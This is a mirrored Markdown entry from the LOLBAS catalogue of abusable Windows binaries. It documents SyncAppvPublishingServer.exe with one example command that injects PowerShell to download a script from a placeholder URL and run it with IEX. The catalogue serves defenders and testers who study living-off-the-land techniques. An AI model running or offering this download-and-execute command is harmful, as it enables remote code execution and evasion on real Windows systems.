mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-27 15:28:34 +01:00
17 lines
442 B
Markdown
17 lines
442 B
Markdown
|
## SyncAppvPublishingServer.exe
|
||
|
* Functions: Execute
|
||
|
```
|
||
|
|
||
|
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
|
||
|
Example command on how inject Powershell code into the process
|
||
|
```
|
||
|
|
||
|
* Resources:
|
||
|
* https://twitter.com/monoxgas/status/895045566090010624
|
||
|
|
||
|
* Full path:
|
||
|
* C:\Windows\System32\SyncAppvPublishingServer.exe
|
||
|
|
||
|
* Notes: Thanks to Nick Landers - @monoxgas
|
||
|
|